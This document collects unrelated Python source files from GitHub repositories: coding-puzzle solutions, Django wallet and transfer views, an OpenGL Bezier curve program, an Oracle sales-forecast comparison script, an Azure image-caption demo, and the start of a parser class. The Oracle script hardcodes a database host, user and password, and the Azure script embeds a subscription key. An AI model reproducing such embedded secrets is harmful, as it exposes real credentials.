+{"seq_id":"3774412609","text":"\"\"\"\nIn stock market , a person buys a stock and sells it on some future date. Given the stock prices of N days in an form\nof an array A[ ] and a positive integer K, find out the maximum profit a person can make in atmost K transactions.\nA transaction is equivalent to (buying + selling) of a stock and new transaction can start only when the previous\ntransaction has been completed.\n\nInput:\nThe first line of input contains an integer T denoting the number of test cases. Then T test cases follow. The first\nline of each test case contains a positve integer K, denoting the number of transactions.The second line of each test\ncase contains a positve integer N, denoting the length of the array A[ ].The third line of each test case contains a N\nspace separated positive integers, denoting the prices of each day in the array A[ ].\n\nOutput:\nPrint out the maximum profit earned by the person.No profit will be equivalent to 0.\n\nConstraints:\n1 <= T <= 100\n0 < K <= 200\n2 <= N <=500\n0 <= A[ ] <= 1000\n\nExamples:\nInput:\n3\n2\n6\n10 22 5 75 65 80\n3\n4\n20 580 420 900\n1\n5\n100 90 80 50 25\nOutput:\n87\n1040\n0\n\nExplanation:\nOutput 1: Trader earns 87 as sum of 12 and 75 i.e. Buy at price 10, sell at 22, buy at 5 and sell at 80\nOutput 2: Trader earns 1040 as sum of 560 and 480 i.e. Buy at price 20, sell at 580, buy at 420 and sell at 900\nOutput 3: Trader cannot make any profit as selling price is decreasing day by day.Hence, it is not possible to earn\nanything.\n\"\"\"\nimport sys\ntCases = int(input())\nfor _ in range(tCases):\n k = int(input())\n n = int(input())\n price = list(map(int, input().split()))\n buy = [-sys.maxsize for i in range(k)]\n sell = [0 for x in range(k)]\n for i in range(n):\n buy[0] = max(buy[0], -price[i])\n sell[0] = max(sell[0], buy[0]+price[i])\n for j in range(1, k):\n buy[j] = max(buy[j], sell[j-1]-price[i])\n sell[j] = max(sell[j], buy[j]+price[i])\n print(sell[k-1])","repo_name":"amit-kr-debug/CP","sub_path":"Geeks for geeks/array/Maximum profit by buying and selling a share at most k times.py","file_name":"Maximum profit by buying and selling a share at most k times.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"26399682341","text":"import json\n\nfrom django.http.response import HttpResponse\nfrom rest_framework import permissions, status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom credits.models.credits import Invitation, Transfer, Wallet \nfrom credits.serializers.credits import InvitationSerializer, InvitationSerializerCreate, \\\n TransferSerializer, TransferSerializerCreate, WalletSerializer\n\n\n\nclass InvitationsView(APIView):\n permission_classes = (permissions.IsAuthenticated,)\n\n # Remaining\n # invitation_filter\n # filter_query_params\n \n \n def get(self, request):\n obj = Invitation.objects.all()\n serializers = InvitationSerializer(obj, many=True)\n data = serializers.data\n return Response({\"DATA\" : data}, status=status.HTTP_201_CREATED)\n \n\n def post(self, request):\n serializer = InvitationSerializerCreate(data=request.data, context={\"request\": request})\n if serializer.is_valid():\n serializer.save()\n data=serializer.data\n return Response({\"DATA\" : data}, status=status.HTTP_201_CREATED)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n\nclass TransferView(APIView):\n permission_classes = 
(permissions.IsAuthenticated,)\n \n \n def get(self, request):\n obj = Transfer.objects.all()\n serializers = TransferSerializer(obj, many=True)\n data = serializers.data\n return Response({\"DATA\" : data}, status=status.HTTP_200_OK)\n \n \n \n \n def post(self, request):\n sender = self.request.user\n amount = self.request.data.get('amount')\n receiver = self.request.data.get('receiver')\n \n sender_obj, created = Wallet.objects.get_or_create(user__username=sender)\n receiver_obj, created = Wallet.objects.get_or_create(user_id=receiver)\n \n if sender_obj.balance <= 0: \n return Response(\"Sender wallet balance must be greater than zero\", status=status.HTTP_400_BAD_REQUEST)\n \n elif sender_obj.balance < int(amount): \n return Response(\"Insufficient Sender Wallet Balance\", status=status.HTTP_400_BAD_REQUEST)\n \n \n else:\n sender_obj.balance -= int(amount)\n receiver_obj.balance += int(amount)\n sender_obj.save()\n receiver_obj.save()\n\n serializer = TransferSerializerCreate(data=request.data, context={\"request\" : request})\n if serializer.is_valid():\n serializer.save()\n data = serializer.data\n return Response({\"DATA\" : data}, status=status.HTTP_201_CREATED)\n else:\n return Response({\"ERRORS\" : serializer.errors}, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass WalletView(APIView):\n \n def get(self, request, id):\n print(id, 'id')\n wallet_obj = Wallet.objects.filter(user__id=id)\n if wallet_obj.exists():\n serializer = WalletSerializer(wallet_obj, many=True)\n return Response({\"WALLET INFO\" : serializer.data}, status=status.HTTP_200_OK)\n else:\n return Response({\"ERRORS\" : \"USER WALLET DOES NOT EXIST\"})\n ","repo_name":"Shubham-7777/Social-Media-Project","sub_path":"core/credits/views/credits.py","file_name":"credits.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20001735390","text":"'''\r\nUniversidade Federal de Pernambuco - Campus Recife\r\nStudent: Paula Crislaine de Oliveira Souza Vaz\r\nLogin: pcosv\r\nRegistration: 098.868.804-22\r\nProfessor: Silvio Melo\r\nProject I - Graphics Processing\r\n'''\r\n\r\nfrom OpenGL.GL import *\r\nfrom OpenGL.GLU import *\r\nfrom OpenGL.GLUT import *\r\nfrom ponto import Ponto\r\nimport bezier\r\nimport sys\r\n\r\nindice = 0\r\npontos = []\r\ntamanho_ponto = 6.0\r\n\r\n\r\n# read the values provided by the user from the input file\r\nwith open('entrada','r') as input:\r\n arquivo = input.readlines()\r\n grau = int(arquivo[1])\r\n fator = int(arquivo[3])\r\n tam_quad = float(arquivo[5])\r\n\r\n# handle the case where the user enters a value too large for the square\r\nif tam_quad > 600:\r\n tam_quad = 600\r\n\r\n# set the window size\r\nwindow_h = 700\r\nwindow_w = 700\r\n\r\n# compute the number of control points of the bezier curve\r\nqtd_pontos = grau + 1\r\n\r\n# vertices of the square\r\nponto_a = Ponto(50.0, 50.0)\r\nponto_b = Ponto(ponto_a.coord_x + tam_quad, ponto_a.coord_y)\r\nponto_c = Ponto(ponto_a.coord_x + tam_quad, ponto_b.coord_y + tam_quad)\r\nponto_d = Ponto(ponto_a.coord_x, ponto_b.coord_y + tam_quad)\r\nquadrado = [ponto_a, ponto_b, ponto_c, ponto_d]\r\n\r\nlimite = [ponto_a.coord_y, ponto_b.coord_y + tam_quad]\r\n\r\n# this function computes the control point coordinates from the square's vertices\r\ndef preencher_pontos():\r\n global pontos\r\n\r\n pontos = [Ponto(float(\"{0:.4f}\".format((ponto_d.coord_x))),float(\"{0:.4f}\".format((ponto_d.coord_y + 
(ponto_a.coord_y - ponto_d.coord_y)/2))))]\r\n i = 1\r\n while i < qtd_pontos:\r\n pontos.append(Ponto(float(\"{0:.4f}\".format((pontos[i-1].coord_x + (ponto_c.coord_x - ponto_d.coord_x)/grau))), float(\"{0:.4f}\".format((ponto_d.coord_y + (ponto_a.coord_y - ponto_d.coord_y)/2)))))\r\n i = i + 1\r\n\r\n return pontos\r\n\r\n# redraws the window whenever needed\r\ndef desenha():\r\n global globVector\r\n\r\n glClear(GL_COLOR_BUFFER_BIT)\r\n\r\n # draw the square\r\n glBegin(GL_QUADS)\r\n glColor3f(0.75, 0.75, 0.75)\r\n for ponto in quadrado:\r\n glVertex2f(ponto.coord_x, ponto.coord_y)\r\n glEnd()\r\n\r\n # draw the curve's control points\r\n if pontos.__len__() > 0:\r\n glPointSize(12.0)\r\n glBegin(GL_POINTS)\r\n glColor3f(1.0, 0.0, 0.0)\r\n for ponto in pontos:\r\n glVertex2f(ponto.coord_x, ponto.coord_y)\r\n glEnd()\r\n\r\n # draw the lines between the control points\r\n if pontos.__len__() > 1:\r\n glBegin(GL_LINE_STRIP)\r\n glColor3f(0.0, 1.0, 1.0)\r\n for ponto in pontos:\r\n glVertex2f(ponto.coord_x, ponto.coord_y)\r\n glEnd()\r\n\r\n # draw the bezier curve (lines connecting the points computed by De Casteljau)\r\n glBegin(GL_LINE_STRIP)\r\n glColor3f(1.0, 1.0, 1.0)\r\n globVector = bezier.bezier(pontos, fator)\r\n glEnd()\r\n\r\n glPointSize(6.0)\r\n\r\n # draw the points\r\n glBegin(GL_POINTS)\r\n glColor3f(0.0, 1.0, 0.0)\r\n globVector.append(pontos[-1])\r\n for p in globVector:\r\n glVertex2d(p.coord_x, p.coord_y)\r\n glEnd()\r\n\r\n # enable blending for the filled region\r\n poligono = [ponto_b] + [ponto_a] + globVector\r\n glEnable(GL_BLEND)\r\n glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)\r\n\r\n # paint the area bounded by the curve\r\n glBegin(GL_POLYGON)\r\n glColor4f(0.0,0.0,0.3,0.7)\r\n for p in poligono:\r\n glVertex2d(p.coord_x, p.coord_y)\r\n glEnd()\r\n\r\n else:\r\n aux = pontos[0]\r\n glVertex2d(aux.coord_x, aux.coord_y)\r\n\r\n glFlush()\r\n\r\n# keyboard handler (GLUT passes the key as a byte string plus cursor coordinates)\r\ndef teclado(tecla, x, y):\r\n # pressing esc closes the window\r\n if tecla == b'\\x1b':\r\n sys.exit(0)\r\n glutPostRedisplay()\r\n\r\n# handles initialization\r\ndef inicializa ():\r\n glMatrixMode(GL_PROJECTION)\r\n glLoadIdentity()\r\n glMatrixMode(GL_MODELVIEW)\r\n glLoadIdentity()\r\n gluOrtho2D(0.0, window_w, window_h, 0.0)\r\n\r\n\r\n# handles mouse clicks\r\ndef gerencia_mouse(botao, estado, x, y):\r\n global indice\r\n vector_size = len(pontos)\r\n\r\n # check whether the clicked point is a control point\r\n for p in range(0, vector_size):\r\n if (x >= pontos[p].coord_x - tamanho_ponto/2) and (x <= pontos[p].coord_x + tamanho_ponto/2):\r\n if (y >= pontos[p].coord_y - tamanho_ponto / 2) and (y <= pontos[p].coord_y + tamanho_ponto / 2):\r\n indice = p\r\n # print (\"botao de controle\"), p\r\n break\r\n\r\n glutPostRedisplay()\r\n\r\n# drags the control points, confined to the square\r\ndef move_ponto(x, y):\r\n global indice\r\n\r\n if y < limite[1] and y > limite[0]:\r\n pontos[indice].coord_y = y\r\n else:\r\n pass\r\n\r\n glutPostRedisplay()\r\n\r\n# prevents window resizing, avoiding distortions in the drawing\r\ndef altera_janela(largura, altura):\r\n glutReshapeWindow(window_w, window_h)\r\n\r\n# main loop\r\nif __name__ == '__main__':\r\n glutInit(sys.argv)\r\n glutInitDisplayMode(GLUT_SINGLE | GLUT_RGBA)\r\n glutInitWindowPosition(300, 0)\r\n glutInitWindowSize(window_w, window_h)\r\n glutCreateWindow(b\"Curva de 
Bezier\")\r\n\r\n glClearColor(0.0, 0.0, 0.0, 0.0)\r\n glMatrixMode(GL_MODELVIEW)\r\n glLoadIdentity()\r\n\r\n pontos = preencher_pontos()\r\n glutDisplayFunc(desenha)\r\n glutReshapeFunc(altera_janela)\r\n glutKeyboardFunc(teclado)\r\n glutMouseFunc(gerencia_mouse)\r\n glutMotionFunc(move_ponto)\r\n inicializa()\r\n glutMainLoop()\r\n\r\n# fim do programa","repo_name":"pcosv/Area-painting-delimited-by-a-functional-bezier-curve","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":5803,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"7834044940","text":"# Find all possible combinations of k numbers that add up to a number n, given that only numbers from 1 to 9 can be used and each combination should be a unique set of numbers.\n# \n# \n# Example 1:\n# \n# Input: k = 3, n = 7\n# \n# Output:\n# \n# [[1,2,4]]\n# \n# Example 2:\n# \n# Input: k = 3, n = 9\n# \n# Output:\n# \n# [[1,2,6], [1,3,5], [2,3,4]]\n# Credits:\n# Special thanks to @mithmatt for adding this problem and creating all test cases.\n# \n# Subscribe to see which companies asked this question\n\n# 2018.03.22\nclass Solution(object):\n def combinationSum3(self, k, n):\n \"\"\"\n :type k: int\n :type n: int\n :rtype: List[List[int]]\n \"\"\"\n def dfs(line, nums):\n if len(line) == k:\n if sum(line) == n:\n res.append(line)\n return\n else:\n return\n \n for i, num in enumerate(nums):\n dfs(line + [num], nums[i+1:])\n \n if k == 0 or n <= 0: return []\n if n > sum([ 9 - i for i in xrange(k)]): return []\n res = []\n nums = [1,2,3,4,5,6,7,8,9]\n dfs([], nums)\n return res\n \n\n# 2017.03.24 Rewrite\nclass Solution(object):\n def combinationSum3(self, k, n):\n \"\"\"\n :type k: int\n :type n: int\n :rtype: List[List[int]]\n \"\"\"\n def dfs(line, A, tgt):\n if tgt < 0: return\n if tgt == 0 and len(line) == k:\n res.append(line)\n return\n \n if len(line) < k:\n for i in xrange(len(A)):\n dfs(line + [A[i]], A[i+1:], tgt - A[i])\n \n nums = [ x for x in xrange(1, 10) ]\n res = []\n dfs([], nums, n)\n return res\n\n#\nclass Solution(object):\n def combinationSum3(self, k, n):\n \"\"\"\n :type k: int\n :type n: int\n :rtype: List[List[int]]\n \"\"\"\n res = []\n nums = range(1, 10)\n print(nums)\n self.dfsHelper(res, nums, [], n, k)\n print(res)\n return res\n\n def dfsHelper(self, res, nums, line, n, k):\n sumList = sum(line)\n if sumList > n or len(line) > k:\n return\n elif sumList == n and len(line) == k:\n res.append(line)\n return\n else:\n for i, num in enumerate(nums):\n self.dfsHelper(res, nums[i+1:], line + [num], n, k)\n\nif __name__ == \"__main__\":\n sol = Solution()\n sol.combinationSum3(3, 7)\n","repo_name":"yihanc/LC","sub_path":"PY/216_combination_sum_iii.py","file_name":"216_combination_sum_iii.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36301410940","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/7/31 9:14\n# @Author : Ye Jinyu__jimmy\n# @File : error_count.py\nimport pandas as pd\nimport cx_Oracle\nimport os\nimport numpy as np\n# 显示所有列\npd.set_option('display.max_columns', None)\n# 显示所有行\npd.set_option('display.max_rows', 500)\n# 设置value的显示长度为100,默认为50\npd.set_option('max_colwidth', 100)\n# 注:设置环境编码方式,可解决读取数据库乱码问题\nos.environ['NLS_LANG'] = 'SIMPLIFIED CHINESE_CHINA.UTF8'\nfrom matplotlib import pyplot as plt\nimport multiprocessing\nimport re\nfrom matplotlib.ticker import FuncFormatter\nimport matplotlib.dates as 
mdate\n# parse() builds a datetime from a fairly free-form string: English date words, dashes,\n# commas or spaces as separators; a missing time defaults to midnight, a missing date to today, a missing year to this year.\nfrom dateutil.parser import parse\n# from pylab import *\nplt.switch_backend('agg')\nfrom pandas.plotting import register_matplotlib_converters\nregister_matplotlib_converters()\n# the following enables Chinese character support\n# mpl.rcParams['font.sans-serif'] = ['SimHei']\n# read in the data\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.ensemble import RandomForestRegressor\nimport matplotlib.pyplot as plt\nfrom tqdm import *\nimport itertools\nimport datetime\nimport os\nimport copy\nimport sys\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom sklearn.linear_model import LinearRegression\nimport math\nimport warnings\nfrom chinese_calendar import is_workday, is_holiday\n# import chinese_calendar as calendar #\nimport time\nwarnings.filterwarnings(\"ignore\")\n\n\n# read the forecast data (a csv file here)\ndef read_forecast_data(old_path):\n data_old = pd.read_csv(old_path,encoding='utf_8_sig',low_memory=False)\n return data_old\n\n# read the sku name\n#----------------------------------------------------------------> fetch the detailed sales data for each SKU by its id\ndef get_sku_name(sku_id):\n host = \"192.168.1.11\" # database ip\n port = \"1521\" # port\n sid = \"hdapp\" # database name\n dsn = cx_Oracle.makedsn(host, port, sid)\n\n # hd40 is the database username, xfsg0515pos is the login password (defaults)\n conn = cx_Oracle.connect(\"hd40\", \"xfsg0515pos\", dsn)\n # query the outbound detail records\n stkout_detail_sql = \"\"\"SELECT g.NAME FROM GOODSH g WHERE g.gid = %s \"\"\" % (sku_id)\n sku_name = pd.read_sql(stkout_detail_sql, conn)\n conn.close()\n return sku_name\n\n#----------------------------------------------------------------> fetch the DC name by its code\ndef get_dc_name(dc_code):\n host = \"192.168.1.11\" # database ip\n port = \"1521\" # port\n sid = \"hdapp\" # database name\n dsn = cx_Oracle.makedsn(host, port, sid)\n\n # hd40 is the database username, xfsg0515pos is the login password (defaults)\n conn = cx_Oracle.connect(\"hd40\", \"xfsg0515pos\", dsn)\n # query the outbound detail records\n stkout_detail_sql = \"\"\"SELECT s.NAME FROM STORE s where s.gid = %s \"\"\" % (dc_code)\n dc_name = pd.read_sql(stkout_detail_sql, conn)\n conn.close()\n return dc_name\n\n\n#---------------------------------------------------------------------------------> normalize the account date to day granularity\ndef date_normalize(data_frame):\n data_frame['Account_date'] = pd.to_datetime(data_frame['Account_date']).dt.normalize()\n return data_frame\n\n\n#---------------------------------------------------------------------------------> normalize the original OCRDATE\ndef date_original_normalize(data_frame):\n data_frame['OCRDATE'] = pd.to_datetime(data_frame['OCRDATE']).dt.normalize()\n return data_frame\n\n\n#-------------------------------------------------------------------------------> group by date to get the daily sales of each SKU\ndef data_group(data):\n # gross profit rate here is (store sales total - warehouse cost total) / warehouse cost total\n data['GROSS_PROFIT_RATE'] = (data['RTOTAL'] - data['TOTAL']) / data['TOTAL']\n # compute the correct warehouse unit price\n data['PRICE'] = data['PRICE']/ data['QTY']\n # dataframe to hold the grouped data\n sales_data = pd.DataFrame(columns = [\"Account_date\",\"Sku_id\",'Dc_name',\"Sales_qty\",\"Price\",'Gross_profit_rate','Dc_code',\n 'Wrh','Warehouse_name','Sku_name','Munit'])\n sales_data[\"Sales_qty\"]=data.groupby([\"OCRDATE\"],as_index = False).sum()[\"QTY\"]\n sales_data[\"Price\"] = data.groupby([\"OCRDATE\"],as_index = False).mean()[\"PRICE\"]\n sales_data[\"Gross_profit_rate\"] = data.groupby([\"OCRDATE\"],as_index = False).mean()[\"GROSS_PROFIT_RATE\"]\n sales_data[\"Account_date\"]= data.groupby(['OCRDATE']).sum().index\n sales_data[\"Sku_id\"] = [data[\"GDGID\"].iloc[0]]*len(sales_data[\"Sales_qty\"])\n sales_data[\"Dc_name\"] = 
[data[\"DC_NAME\"].iloc[0]] * len(sales_data[\"Sku_id\"])\n sales_data[\"Dc_code\"] = [data[\"SENDER\"].iloc[0]] * len(sales_data[\"Sku_id\"])\n sales_data[\"Munit\"] = [data[\"MUNIT\"].iloc[0]] * len(sales_data[\"Sales_qty\"])\n sales_data[\"Wrh\"] = [data[\"WRH\"].iloc[0]] * len(sales_data[\"Sales_qty\"])\n sales_data[\"Warehouse_name\"] = [data[\"WAREHOUSE_NAME\"].iloc[0]] * len(sales_data[\"Sales_qty\"])\n sales_data[\"Sku_name\"] = [data[\"SKU_NAME\"].iloc[0]] * len(sales_data[\"Sales_qty\"])\n sales_data = sales_data.sort_values( by = ['Account_date'], ascending = False)\n return sales_data\n\n#------------------------------------------------------------------>根据SKU 的id来获取每个SKU的具体的销售明细数据\ndef get_detail_sales_data(sku_id,start_date,end_date,DC_CODE):\n host = \"192.168.1.11\" # 数据库ip\n port = \"1521\" # 端口\n sid = \"hdapp\" # 数据库名称\n dsn = cx_Oracle.makedsn(host, port, sid)\n\n # hd40是数据用户名,xfsg0515pos是登录密码(默认用户名和密码)\n conn = cx_Oracle.connect(\"hd40\", \"xfsg0515pos\", dsn)\n # 查看出货详细单的数据\n stkout_detail_sql = \"\"\"SELECT b.SENDER,s1.NAME AS Dc_name,S.WRH,w.NAME AS \n warehouse_name,g.NAME AS sku_name,s.GDGID,b.NUM,s.RTOTAL,b.OCRDATE,\n s.CRTOTAL,s.MUNIT,s.QTY,s.QTYSTR,\n s.TOTAL,s.PRICE,s.QPC FROM STKOUTDTL s INNER JOIN(\n select *\n from STKOUT s\n INNER JOIN STORE s1 ON s.sender = s1.gid\n INNER JOIN STORE s2 ON s.CLIENT = s2.gid\n WHERE bitand(s1.property,32)=32 \n AND bitand(s2.property,32)<>32 \n AND substr(s2.AREA,2,3)<'8000' \n AND s.CLS='统配出')b ON s.NUM = b.NUM \n AND s.CLS='统配出' AND s.GDGID= %s\n and b.OCRDATE >= to_date('%s','yyyy-mm-dd') \n and b.OCRDATE <= to_date('%s','yyyy-mm-dd') \n and b.sender = %s\n INNER JOIN(SELECT * FROM goodsh G WHERE G.SORT<'8000' )g ON s.gdgid=g.gid\n INNER JOIN(SELECT * FROM WAREHOUSE w WHERE w.NAME LIKE'%%商品仓%%' )w ON w.GID = S.WRH\n INNER JOIN(SELECT * FROM STORE s1 )S1 ON S1.GID = b.SENDER \"\"\" % \\\n (sku_id,start_date,end_date,DC_CODE)\n stkout_detail = pd.read_sql(stkout_detail_sql, conn)\n conn.close\n return stkout_detail\n\n\n\n#------------------------------------------------------------------------->设置函数按照预测的数据,并完成画图\ndef get_real_data(forecast_data,start_date):\n\n DC_list = set(forecast_data['Dc_code'])\n end_date = forecast_data['Account_date'].max()\n print('读取的截止日期和开始日期是:%s,%s,日期格式是%s'%(start_date,end_date,type(end_date)))\n final_data = pd.DataFrame()\n for DC in tqdm(DC_list):\n DC_data = pd.DataFrame()\n forecast_data_mid = forecast_data[forecast_data['Dc_code'] == DC]\n sku_id_list = set(forecast_data_mid['Sku_id'])\n dc_name = forecast_data_mid['Dc_name'].iloc[0]\n for x in tqdm(sku_id_list):\n print('正在读取' + str(DC) + '的统计学指标,sku是'+str(x))\n detail_sales = get_detail_sales_data(x,start_date,end_date,DC)\n forecast_data_mid_sku = forecast_data_mid[forecast_data_mid['Sku_id'] == x ]\n sku_name = forecast_data_mid_sku['Sku_name'].iloc[0]\n print(detail_sales)\n if detail_sales.empty ==True:\n print('该资源为空')\n pass\n else:\n detail_sales = date_original_normalize(detail_sales)\n sales_group = data_group(detail_sales)\n sales_shop_data = sales_group.reset_index(drop=True, inplace=False)\n sales_shop_data = date_normalize(sales_shop_data)\n forecast_data_mid_sku = date_normalize(forecast_data_mid_sku)\n print('sales_shop_data',sales_shop_data)\n print('forecast_data_mid_sku', forecast_data_mid_sku)\n DC_data = pd.merge(sales_shop_data,forecast_data_mid_sku,\n on=['Account_date','Sku_id','Dc_name',\n 'Dc_code','Munit','Warehouse_name'\n ,'Sku_name','Wrh'],how='outer')\n\n # if 
os.path.exists('D:/jimmy-ye/AI_supply_chain/data/'\n # 'forecast_holiday/total_compare' + str(int(DC)) + str(dc_name) +\n # '_' + str(int(x)) + str(sku_name) + '.csv'):\n DC_data.to_csv('D:/jimmy-ye/AI_supply_chain/data/'\n 'forecast_holiday/total_compare' + str(int(DC)) + str(dc_name) +\n '_' + str(int(x)) + str(sku_name) + '.csv',encoding='utf_8_sig')\n\n mean_error = DC_data.fillna(method='ffill')\n # print('mean_error')\n # print(mean_error)\n DC_data = DC_data.append(mean_error)\n # else:\n # pass\n # print(DC_data)\n final_data = final_data.append(DC_data)\n return final_data\n\n\n\n\n\ndef main_function(old_path,start_date):\n data = read_forecast_data(old_path)\n final_data= get_real_data(data,start_date)\n print(final_data)\n final_data.to_csv('D:/jimmy-ye/AI_supply_chain/data/'\n 'forecast_holiday/total_compare.csv',\n encoding=\"utf_8_sig\")\n\n\n\n\nstart = '20180101'\n\n\nmain_function('D:/jimmy-ye/AI_supply_chain/data/forecast_holiday/final_holiday.csv',start)\n","repo_name":"jimmyeva/AI-predict","sub_path":"xianfengsg/forecaset/V1.2/error_count.py","file_name":"error_count.py","file_ext":"py","file_size_in_byte":10723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70093738989","text":"from collections import deque\n\ndef solution(n, computers):\n def BFS(k):\n nonlocal answer\n answer += 1\n Q = deque([k])\n while Q:\n nr = Q.popleft()\n\n for nc in range(0, n):\n\n if computers[nr][nc] and not v[nc]:\n v[nc] = 1\n Q.append(nc)\n\n v = [0] * n\n answer = 0\n\n for i in range(n):\n for j in range(n):\n if computers[i][j] and not v[j]:\n BFS(i)\n\n print(answer)\n return answer\n\n\nn = 3\ncomputers = [[1, 1, 0], [1, 1, 0], [0, 0, 1]]\n\nsolution(n,computers)","repo_name":"heogeon0/Algorithm","sub_path":"DFSBFS/프로그래머스_네트워크.py","file_name":"프로그래머스_네트워크.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33658878674","text":"from backgorund_image import backgroundImage\r\nfrom check_directory import add_path\r\ndef filter_background_image():\r\n type_filter = int(input('type_filter : '))\r\n background_filter =''\r\n color = ''\r\n type_of_background = input('enter type of background : [gray,image,blur,color] : ')\r\n\r\n path_input_image=add_path(input('image path : '),'Input_image/')\r\n\r\n if type_filter ==0 and type_of_background == 'image' :\r\n background_filter = add_path(input('path image : '), 'input_background/')\r\n backgroundImage(type_of_background, path_input_image,color, background_filter)\r\n\r\n\r\n if type_of_background=='color':\r\n add_color = input('input color rgb : 0,0,255 : ')\r\n color = tuple(map(int, add_color.split(',')))\r\n\r\n if type_filter == 1 :\r\n backgroundImage(type_of_background,path_input_image,color,'../assest/background/back1.png')\r\n if type_filter == 2 :\r\n backgroundImage(type_of_background,path_input_image,color,'../assest/background/back2.png')\r\n\r\nfilter_background_image()","repo_name":"Python-Hiss/Filteristic","sub_path":"background_image/filter_background_image.py","file_name":"filter_background_image.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41427488391","text":"class Solution(object):\n def subtractProductAndSum(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n inpu = n\n prod = 1\n summed = 0\n while inpu != 0:\n digit 
= inpu % 10\n # floor division so the loop terminates on both Python 2 and 3\n inpu = inpu // 10\n prod *= digit\n summed += digit\n return prod - summed","repo_name":"BhavyaShah99/leet-code-hackerrank-practice","sub_path":"sub-product-and-sum.py","file_name":"sub-product-and-sum.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22442590188","text":"from django.shortcuts import render\nfrom .models import Post, Contato\n\n# Create your views here.\n\ndef hello_blog(request):\n lista = [\n 'Django', 'Python', 'Git', 'Html',\n 'Banco de dados', 'Admin', 'Java', 'C++',\n 'C#'\n ]\n list_posts = Post.objects.all()\n\n data = {\n 'name': 'Django 3', \n 'lista_tecnologias': lista, \n 'posts': list_posts}\n \n \n return render(request, 'index.html', data)\n\ndef post_detail(request, id):\n post = Post.objects.get(id=id)\n return render(request, 'post_detail.html', {'post': post})\n\ndef save_form(request):\n name = request.POST['name']\n Contato.objects.create(\n name=name,\n email=request.POST['email'],\n message=request.POST['message']\n )\n return render(request, 'contato_sucesso.html', {'name_contato': name})","repo_name":"cadu77/Blog-2","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74503875626","text":"import requests\n# If you are using a Jupyter notebook, uncomment the following line.\n#%matplotlib inline\nimport matplotlib.pyplot as plt\nimport json\nfrom PIL import Image\nfrom io import BytesIO\n\n# Replace with your valid subscription key.\nsubscription_key = \"397e1aeb8cb14c8a90d246bfa8d32cd2\"\nassert subscription_key\n\n# You must use the same region in your REST call as you used to get your\n# subscription keys. For example, if you got your subscription keys from\n# westus, replace \"westcentralus\" in the URI below with \"westus\".\n#\n# Free trial subscription keys are generated in the \"westus\" region.\n# If you use a free trial subscription key, you shouldn't need to change\n# this region.\nvision_base_url = \"https://westcentralus.api.cognitive.microsoft.com/vision/v2.0/\"\n\nanalyze_url = vision_base_url + \"analyze\"\n\n# Set image_url to the URL of an image that you want to analyze.\nimage_url = \"https://www.gannett-cdn.com/presto/2018/11/28/USAT/294aec28-e899-48e0-a50b-632fa588f58b-AP_AptOPIX_Trump.JPG?crop=1471,1269,x1623,y129&width=534&height=401&fit=bounds&auto=webp\"\n\nheaders = {'Ocp-Apim-Subscription-Key': subscription_key }\nparams = {'visualFeatures': 'Categories,Description,Color'}\ndata = {'url': image_url}\nresponse = requests.post(analyze_url, headers=headers, params=params, json=data)\nresponse.raise_for_status()\n\n# The 'analysis' object contains various fields that describe the image. The most
The most\n# relevant caption for the image is obtained from the 'description' property.\nanalysis = response.json()\nprint(json.dumps(response.json()))\nimage_caption = analysis[\"description\"][\"captions\"][0][\"text\"].capitalize()\n\n# Display the image and overlay it with the caption.\nimage = Image.open(BytesIO(requests.get(image_url).content))\nplt.imshow(image)\nplt.axis(\"off\")\n_ = plt.title(image_caption, size=\"x-large\", y=-0.1)\nplt.show()\n","repo_name":"danny-ngo/awesomeface","sub_path":"azure.py","file_name":"azure.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"11647617592","text":"import sys\nfrom code.logging.logger import Logger\nfrom code.parser.parameter import Parameter\nfrom code.parser.parameterlist import ParameterList\nfrom code.parser.parser import Parser\nfrom pyparsing import Regex, Forward, ZeroOrMore, Optional, ParseException\n\n\n \nclass Constructor(ParameterList, Parser):\n \"\"\"Class to parse constructor information.\n\n The parameter (return type, member function invocation, parameter list) \n will be parsed by this class.\n \n Inherits from:\n ParameterList: Storage of parameter information in list.\n Parser: Provides procedure parse()\n \n Variables:\n constructor: Fully qualified constructor invocation name.\n class_name: Class name of constructor.\n \"\"\" \n \n def __init__(self, argument):\n \"\"\"Constructor.\n \n Variables:\n argument: Data to be parsed.\n \"\"\"\n ParameterList.__init__(self)\n \n self.constructor = None\n self.class_name = None\n self.template_args = None\n\n self.parse(argument)\n \n \n def parse(self, argument):\n \"\"\"Procedure to parse constructor information.\n \n Variables:\n argument: Data to be parsed.\n \"\"\"\n # pyparsing syntax parser definition\n template = ZeroOrMore(' ') + Regex(r'<[a-zA-Z0-9\\,\\ ]+>') + \\\n 